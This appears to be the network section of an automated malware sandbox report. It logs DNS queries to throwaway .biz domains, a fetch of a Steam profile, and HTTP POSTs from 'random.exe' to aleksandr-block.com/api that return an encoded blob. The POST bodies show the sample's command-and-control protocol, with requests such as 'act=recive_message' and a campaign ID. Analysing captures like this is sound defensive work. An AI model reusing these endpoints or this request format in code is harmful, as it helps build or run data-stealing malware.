                                                  Jan 14, 2025 09:53:18.479654074 CET49742443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:18.480030060 CET49742443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:18.480047941 CET44349742188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:18.968514919 CET44349742188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:18.968626022 CET49742443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:18.969955921 CET49742443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:18.969965935 CET44349742188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:18.970201969 CET44349742188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:18.971441984 CET49742443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:18.971473932 CET49742443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:18.971510887 CET44349742188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:19.437836885 CET44349742188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:19.437937975 CET44349742188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:19.437994003 CET49742443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:19.438220978 CET49742443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:19.438249111 CET44349742188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:19.438266993 CET49742443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:19.438276052 CET44349742188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:45.377474070 CET5344853192.168.2.5162.159.36.2
                                                  Jan 14, 2025 09:53:45.382297039 CET5353448162.159.36.2192.168.2.5
                                                  Jan 14, 2025 09:53:45.382370949 CET5344853192.168.2.5162.159.36.2
                                                  Jan 14, 2025 09:53:45.387422085 CET5353448162.159.36.2192.168.2.5
                                                  Jan 14, 2025 09:53:45.846771002 CET5344853192.168.2.5162.159.36.2
                                                  Jan 14, 2025 09:53:45.851963043 CET5353448162.159.36.2192.168.2.5
                                                  Jan 14, 2025 09:53:45.852076054 CET5344853192.168.2.5162.159.36.2
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 14, 2025 09:53:03.072390079 CET5607353192.168.2.51.1.1.1
                                                  Jan 14, 2025 09:53:03.081022978 CET53560731.1.1.1192.168.2.5
                                                  Jan 14, 2025 09:53:03.087066889 CET5085353192.168.2.51.1.1.1
                                                  Jan 14, 2025 09:53:03.097950935 CET53508531.1.1.1192.168.2.5
                                                  Jan 14, 2025 09:53:03.099666119 CET6400853192.168.2.51.1.1.1
                                                  Jan 14, 2025 09:53:03.109841108 CET53640081.1.1.1192.168.2.5
                                                  Jan 14, 2025 09:53:03.111488104 CET6044953192.168.2.51.1.1.1
                                                  Jan 14, 2025 09:53:03.120172024 CET53604491.1.1.1192.168.2.5
                                                  Jan 14, 2025 09:53:03.124675989 CET5486353192.168.2.51.1.1.1
                                                  Jan 14, 2025 09:53:03.133766890 CET53548631.1.1.1192.168.2.5
                                                  Jan 14, 2025 09:53:03.140966892 CET4916353192.168.2.51.1.1.1
                                                  Jan 14, 2025 09:53:03.149560928 CET53491631.1.1.1192.168.2.5
                                                  Jan 14, 2025 09:53:03.153320074 CET6184053192.168.2.51.1.1.1
                                                  Jan 14, 2025 09:53:03.163399935 CET53618401.1.1.1192.168.2.5
                                                  Jan 14, 2025 09:53:03.168633938 CET5785553192.168.2.51.1.1.1
                                                  Jan 14, 2025 09:53:03.177815914 CET53578551.1.1.1192.168.2.5
                                                  Jan 14, 2025 09:53:03.179519892 CET6205053192.168.2.51.1.1.1
                                                  Jan 14, 2025 09:53:03.188396931 CET53620501.1.1.1192.168.2.5
                                                  Jan 14, 2025 09:53:03.189961910 CET5769353192.168.2.51.1.1.1
                                                  Jan 14, 2025 09:53:03.196672916 CET53576931.1.1.1192.168.2.5
                                                  Jan 14, 2025 09:53:04.677268028 CET5526053192.168.2.51.1.1.1
                                                  Jan 14, 2025 09:53:04.684878111 CET53552601.1.1.1192.168.2.5
                                                  Jan 14, 2025 09:53:45.376672983 CET5359122162.159.36.2192.168.2.5
                                                  Jan 14, 2025 09:53:47.106815100 CET53554681.1.1.1192.168.2.5
                                                  Jan 14, 2025 09:53:47.106838942 CET53554681.1.1.1192.168.2.5
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Jan 14, 2025 09:53:03.072390079 CET192.168.2.51.1.1.10x13c3Standard query (0)owerinternal.sbsA (IP address)IN (0x0001)false
                                                  Jan 14, 2025 09:53:03.087066889 CET192.168.2.51.1.1.10x85afStandard query (0)fraggielek.bizA (IP address)IN (0x0001)false
                                                  Jan 14, 2025 09:53:03.099666119 CET192.168.2.51.1.1.10x6a1Standard query (0)grandiouseziu.bizA (IP address)IN (0x0001)false
                                                  Jan 14, 2025 09:53:03.111488104 CET192.168.2.51.1.1.10x3b2fStandard query (0)littlenotii.bizA (IP address)IN (0x0001)false
                                                  Jan 14, 2025 09:53:03.124675989 CET192.168.2.51.1.1.10x5751Standard query (0)marketlumpe.bizA (IP address)IN (0x0001)false
                                                  Jan 14, 2025 09:53:03.140966892 CET192.168.2.51.1.1.10x4dd7Standard query (0)nuttyshopr.bizA (IP address)IN (0x0001)false
                                                  Jan 14, 2025 09:53:03.153320074 CET192.168.2.51.1.1.10x5233Standard query (0)punishzement.bizA (IP address)IN (0x0001)false
                                                  Jan 14, 2025 09:53:03.168633938 CET192.168.2.51.1.1.10x821cStandard query (0)spookycappy.bizA (IP address)IN (0x0001)false
                                                  Jan 14, 2025 09:53:03.179519892 CET192.168.2.51.1.1.10xb242Standard query (0)truculengisau.bizA (IP address)IN (0x0001)false
                                                  Jan 14, 2025 09:53:03.189961910 CET192.168.2.51.1.1.10x7c67Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                  Jan 14, 2025 09:53:04.677268028 CET192.168.2.51.1.1.10x9a0fStandard query (0)aleksandr-block.comA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Jan 14, 2025 09:53:03.081022978 CET1.1.1.1192.168.2.50x13c3Name error (3)owerinternal.sbsnonenoneA (IP address)IN (0x0001)false
                                                  Jan 14, 2025 09:53:03.097950935 CET1.1.1.1192.168.2.50x85afName error (3)fraggielek.biznonenoneA (IP address)IN (0x0001)false
                                                  Jan 14, 2025 09:53:03.109841108 CET1.1.1.1192.168.2.50x6a1Name error (3)grandiouseziu.biznonenoneA (IP address)IN (0x0001)false
                                                  Jan 14, 2025 09:53:03.120172024 CET1.1.1.1192.168.2.50x3b2fName error (3)littlenotii.biznonenoneA (IP address)IN (0x0001)false
                                                  Jan 14, 2025 09:53:03.133766890 CET1.1.1.1192.168.2.50x5751Name error (3)marketlumpe.biznonenoneA (IP address)IN (0x0001)false
                                                  Jan 14, 2025 09:53:03.149560928 CET1.1.1.1192.168.2.50x4dd7Name error (3)nuttyshopr.biznonenoneA (IP address)IN (0x0001)false
                                                  Jan 14, 2025 09:53:03.163399935 CET1.1.1.1192.168.2.50x5233Name error (3)punishzement.biznonenoneA (IP address)IN (0x0001)false
                                                  Jan 14, 2025 09:53:03.177815914 CET1.1.1.1192.168.2.50x821cName error (3)spookycappy.biznonenoneA (IP address)IN (0x0001)false
                                                  Jan 14, 2025 09:53:03.188396931 CET1.1.1.1192.168.2.50xb242Name error (3)truculengisau.biznonenoneA (IP address)IN (0x0001)false
                                                  Jan 14, 2025 09:53:03.196672916 CET1.1.1.1192.168.2.50x7c67No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                  Jan 14, 2025 09:53:04.684878111 CET1.1.1.1192.168.2.50x9a0fNo error (0)aleksandr-block.com188.114.97.3A (IP address)IN (0x0001)false
                                                  Jan 14, 2025 09:53:04.684878111 CET1.1.1.1192.168.2.50x9a0fNo error (0)aleksandr-block.com188.114.96.3A (IP address)IN (0x0001)false
                                                  • steamcommunity.com
                                                  • aleksandr-block.com
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.549704104.102.49.254443528C:\Users\user\Desktop\random.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-14 08:53:03 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                  Connection: Keep-Alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Host: steamcommunity.com
                                                  2025-01-14 08:53:04 UTC1905INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                  Cache-Control: no-cache
                                                  Date: Tue, 14 Jan 2025 08:53:04 GMT
                                                  Content-Length: 35141
                                                  Connection: close
                                                  Set-Cookie: sessionid=bc039213067478b591f0cc20; Path=/; Secure; SameSite=None
                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                  2025-01-14 08:53:04 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                  2025-01-14 08:53:04 UTC16384INData Raw: 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a
                                                  Data Ascii: eamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">
                                                  2025-01-14 08:53:04 UTC3768INData Raw: 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22
                                                  Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="
                                                  2025-01-14 08:53:04 UTC510INData Raw: 61 6e 6b 22 3e 53 74 65 61 6d 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22
                                                  Data Ascii: ank">Steam Subscriber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.549705188.114.97.3443528C:\Users\user\Desktop\random.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-14 08:53:05 UTC266OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 8
                                                  Host: aleksandr-block.com
                                                  2025-01-14 08:53:05 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                  Data Ascii: act=life
                                                  2025-01-14 08:53:05 UTC1125INHTTP/1.1 200 OK
                                                  Date: Tue, 14 Jan 2025 08:53:05 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=e70e75kqjgjd7qrincl4peobkq; expires=Sat, 10 May 2025 02:39:44 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  X-Frame-Options: DENY
                                                  X-Content-Type-Options: nosniff
                                                  X-XSS-Protection: 1; mode=block
                                                  cf-cache-status: DYNAMIC
                                                  vary: accept-encoding
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wpqZ%2BnxWC4dcu6cmM7RdD%2BXCgA2Ykz0Icx1BDmHG09j9ORf04L0LuJLdm3Phm7UOHtoBAPXMDBGdQ65AEzRfNQczQTf9MPQSh7VinIoQCjS8oMCIJEXKEMYb%2B5TGeb12O9Emz6G0"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 901c64c46d637c9f-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1807&min_rtt=1805&rtt_var=681&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2846&recv_bytes=910&delivery_rate=1603514&cwnd=221&unsent_bytes=0&cid=e2fe12a9346f79a7&ts=419&x=0"
                                                  2025-01-14 08:53:05 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                  Data Ascii: 2ok
                                                  2025-01-14 08:53:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.549707188.114.97.3443528C:\Users\user\Desktop\random.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-01-14 08:53:06 UTC267OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 46
                                                  Host: aleksandr-block.com
                                                  2025-01-14 08:53:06 UTC46OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d
                                                  Data Ascii: act=recive_message&ver=4.0&lid=FATE99--test&j=
                                                  2025-01-14 08:53:06 UTC1127INHTTP/1.1 200 OK
                                                  Date: Tue, 14 Jan 2025 08:53:06 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=jqk2nav5muankbpiae9jp62th1; expires=Sat, 10 May 2025 02:39:45 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  X-Frame-Options: DENY
                                                  X-Content-Type-Options: nosniff
                                                  X-XSS-Protection: 1; mode=block
                                                  cf-cache-status: DYNAMIC
                                                  vary: accept-encoding
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nc2o6PJ1UC8%2FvnxY83F6U5MipEQmKbi%2BoX3MAbfdokMWL8To37ES9qmoLeaJBOowQoE821oQBuut8v8zZpIWPnvDilKvEaTej5SjsspN1A39kbjzMmEO%2Fev6W7rnfme%2BkoEcezzh"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 901c64ca0ac4efa1-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1953&min_rtt=1946&rtt_var=744&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=949&delivery_rate=1455633&cwnd=165&unsent_bytes=0&cid=141c63428ead76b4&ts=466&x=0"
                                                  2025-01-14 08:53:06 UTC242INData Raw: 34 36 65 0d 0a 42 54 4d 74 58 6c 30 37 2f 55 36 6f 4d 73 55 56 64 45 2b 73 47 76 6a 33 51 6a 34 55 6c 50 77 2b 51 50 6b 42 56 34 41 52 6f 45 4e 2b 45 56 74 38 5a 77 2f 52 62 4e 74 58 35 79 38 41 50 64 6c 2f 31 4e 55 6a 57 6a 61 75 6d 6c 38 73 69 6d 52 37 6f 6d 66 4e 59 54 39 56 54 44 49 75 58 74 46 73 7a 55 72 6e 4c 79 38 30 6a 6e 2b 57 31 58 67 63 63 66 36 65 58 79 79 62 59 44 7a 76 59 63 77 67 62 56 39 4b 4e 6a 68 59 6d 53 2f 45 58 36 42 77 45 53 37 47 64 4a 47 61 4b 6c 4d 32 75 4e 35 62 4f 74 73 37 64 63 31 30 31 43 4a 49 55 6c 34 31 66 30 62 52 4e 59 70 58 71 7a 64 4f 62 63 31 2f 6d 70 73 6b 57 6e 2f 38 6c 46 59 6b 6d 6d 55 39 38 48 6a 47 4b 32 31 52 53 54 63 79 55 59 30 69 7a 6c 69 72 64 68 73 75 6a 6a 62 61 6b
                                                  Data Ascii: 46eBTMtXl07/U6oMsUVdE+sGvj3Qj4UlPw+QPkBV4ARoEN+EVt8Zw/RbNtX5y8APdl/1NUjWjauml8simR7omfNYT9VTDIuXtFszUrnLy80jn+W1Xgccf6eXyybYDzvYcwgbV9KNjhYmS/EX6BwES7GdJGaKlM2uN5bOts7dc101CJIUl41f0bRNYpXqzdObc1/mpskWn/8lFYkmmU98HjGK21RSTcyUY0izlirdhsujjbak
                                                  2025-01-14 08:53:06 UTC899INData Raw: 6a 67 63 4c 72 62 4e 62 69 47 4b 63 69 44 76 59 38 52 68 65 42 39 57 66 44 68 56 33 33 53 4b 57 4b 74 35 45 79 37 42 66 35 75 56 4d 6c 4e 32 39 5a 5a 55 4a 70 46 73 4f 75 31 39 79 43 5a 76 57 45 67 7a 4f 46 47 5a 49 38 6b 51 36 54 63 52 4e 59 34 67 32 72 55 77 58 33 58 69 6b 30 31 69 68 43 30 73 6f 6e 54 4f 59 54 38 52 53 54 49 2b 56 4a 38 2b 77 6c 75 73 63 67 51 6d 78 33 57 58 6c 53 31 57 65 66 57 65 57 79 69 52 62 44 2f 6d 66 73 38 6e 5a 31 45 50 63 6e 39 65 68 32 79 53 45 49 52 79 42 69 72 43 62 74 69 76 59 45 4d 34 37 39 35 62 4c 74 73 37 64 65 70 32 77 53 4a 73 58 6b 77 30 4e 45 75 66 50 73 78 64 6f 6d 55 51 4b 4d 42 79 6d 59 63 71 55 6e 44 31 6c 31 63 72 6e 6d 51 78 6f 6a 32 43 4a 6e 38 52 46 33 77 65 56 4a 51 67 77 45 65 6e 4e 77 6c 6a 31 7a 69 64
                                                  Data Ascii: jgcLrbNbiGKciDvY8RheB9WfDhV33SKWKt5Ey7Bf5uVMlN29ZZUJpFsOu19yCZvWEgzOFGZI8kQ6TcRNY4g2rUwX3Xik01ihC0sonTOYT8RSTI+VJ8+wluscgQmx3WXlS1WefWeWyiRbD/mfs8nZ1EPcn9eh2ySEIRyBirCbtivYEM4795bLts7dep2wSJsXkw0NEufPsxdomUQKMBymYcqUnD1l1crnmQxoj2CJn8RF3weVJQgwEenNwlj1zid
                                                  2025-01-14 08:53:06 UTC1369INData Raw: 34 35 32 36 0d 0a 64 4b 4e 75 6e 51 52 57 4b 63 62 33 57 36 4d 38 30 75 61 46 6c 50 50 54 74 55 6d 79 33 48 58 4b 35 30 47 69 48 47 64 5a 61 52 4c 31 52 2b 39 5a 5a 4f 4c 4a 56 6c 4d 2b 4a 32 67 6d 38 6e 56 6c 64 38 5a 78 6d 37 49 74 31 45 72 44 55 6a 4c 73 42 32 6e 59 4e 67 51 7a 6a 76 33 6c 73 75 32 7a 74 31 37 48 37 4a 4c 57 42 59 54 6a 38 2f 55 35 45 6a 77 46 69 76 64 78 73 73 78 58 43 63 6d 43 74 54 65 66 47 57 58 79 36 65 62 6a 61 69 50 59 49 6d 66 78 45 58 66 42 70 58 6e 44 33 62 45 70 4a 30 47 43 50 4a 62 74 71 4b 62 6b 55 32 38 5a 49 63 65 74 74 70 4d 75 56 33 7a 79 74 6b 56 55 73 78 4d 46 43 57 4a 64 68 61 71 33 6b 45 49 4d 52 39 6c 4a 6b 6c 55 33 62 33 6e 31 49 6f 6b 43 4e 37 6f 6e 54 61 59 54 38 52 59 44 45 76 53 35 55 6e 32 78 4b 53 64 42 67
                                                  Data Ascii: 4526dKNunQRWKcb3W6M80uaFlPPTtUmy3HXK50GiHGdZaRL1R+9ZZOLJVlM+J2gm8nVld8Zxm7It1ErDUjLsB2nYNgQzjv3lsu2zt17H7JLWBYTj8/U5EjwFivdxssxXCcmCtTefGWXy6ebjaiPYImfxEXfBpXnD3bEpJ0GCPJbtqKbkU28ZIcettpMuV3zytkVUsxMFCWJdhaq3kEIMR9lJklU3b3n1IokCN7onTaYT8RYDEvS5Un2xKSdBg
                                                  2025-01-14 08:53:06 UTC1369INData Raw: 72 6f 6a 53 6e 79 32 67 52 49 37 32 32 51 35 6f 69 75 43 4b 32 74 56 54 44 41 32 56 5a 49 74 7a 6c 65 71 63 78 59 72 79 48 32 62 6e 69 68 51 65 66 79 53 57 43 36 53 5a 54 6e 68 63 4d 52 68 4b 52 46 49 4a 48 38 42 33 77 33 48 57 36 74 33 46 54 7a 4a 4f 4e 54 56 4c 6c 70 32 74 73 5a 4b 4d 6f 78 6b 4b 71 78 71 67 69 5a 72 45 52 64 38 4e 55 75 61 49 73 35 61 6f 6e 4d 61 4a 38 35 39 69 4a 30 6d 57 33 72 2b 6d 31 4d 6b 6e 6d 34 79 36 58 44 51 4d 32 52 56 51 54 42 2f 46 39 38 72 30 68 44 2f 4e 7a 4d 36 7a 57 69 63 6c 6d 42 44 4f 4f 2f 65 57 79 37 62 4f 33 58 69 66 63 34 71 59 46 70 45 4f 44 74 5a 6b 69 66 45 58 71 35 37 48 69 48 4a 61 70 65 51 4b 46 5a 2f 38 35 4a 52 49 59 6c 67 4e 4b 49 39 67 69 5a 2f 45 52 64 38 47 47 71 6f 44 34 70 50 36 57 35 57 4b 73 49 34
                                                  Data Ascii: rojSny2gRI722Q5oiuCK2tVTDA2VZItzleqcxYryH2bnihQefySWC6SZTnhcMRhKRFIJH8B3w3HW6t3FTzJONTVLlp2tsZKMoxkKqxqgiZrERd8NUuaIs5aonMaJ859iJ0mW3r+m1Mknm4y6XDQM2RVQTB/F98r0hD/NzM6zWiclmBDOO/eWy7bO3Xifc4qYFpEODtZkifEXq57HiHJapeQKFZ/85JRIYlgNKI9giZ/ERd8GGqoD4pP6W5WKsI4
                                                  2025-01-14 08:53:06 UTC1369INData Raw: 39 35 2f 64 35 44 62 49 49 6a 4d 75 34 7a 6d 6d 46 67 57 55 63 79 50 46 2b 55 49 4d 5a 52 72 6e 45 54 4a 63 6c 33 6e 5a 77 6e 58 48 44 6b 6d 56 45 72 6d 32 67 38 36 48 66 44 4b 69 63 66 44 7a 73 6e 47 63 64 73 2b 46 65 78 5a 78 56 74 30 54 61 44 31 53 64 51 4e 71 37 65 55 54 43 61 5a 69 66 6d 66 4d 6b 7a 62 46 64 50 4f 53 31 65 6b 79 62 46 55 36 39 36 46 53 58 63 65 4a 65 56 4d 6b 35 77 2f 5a 41 63 62 4e 74 6b 4c 61 49 72 67 68 42 77 57 67 38 6a 63 55 44 66 4b 38 59 51 2f 7a 63 56 4a 38 4e 32 69 4a 45 6d 56 33 58 34 6c 6c 6b 71 6e 32 6b 34 37 58 6a 49 4b 47 39 52 51 44 6b 33 55 70 6b 69 79 31 61 72 65 6c 5a 6a 6a 6e 2b 43 31 58 67 63 55 65 79 54 57 6a 57 4b 56 6a 4c 69 49 6f 49 2b 4b 55 67 50 4f 7a 4d 5a 78 32 7a 48 58 4b 31 36 45 79 6e 47 66 35 6d 55 4c
                                                  Data Ascii: 95/d5DbIIjMu4zmmFgWUcyPF+UIMZRrnETJcl3nZwnXHDkmVErm2g86HfDKicfDzsnGcds+FexZxVt0TaD1SdQNq7eUTCaZifmfMkzbFdPOS1ekybFU696FSXceJeVMk5w/ZAcbNtkLaIrghBwWg8jcUDfK8YQ/zcVJ8N2iJEmV3X4llkqn2k47XjIKG9RQDk3Upkiy1arelZjjn+C1XgcUeyTWjWKVjLiIoI+KUgPOzMZx2zHXK16EynGf5mUL
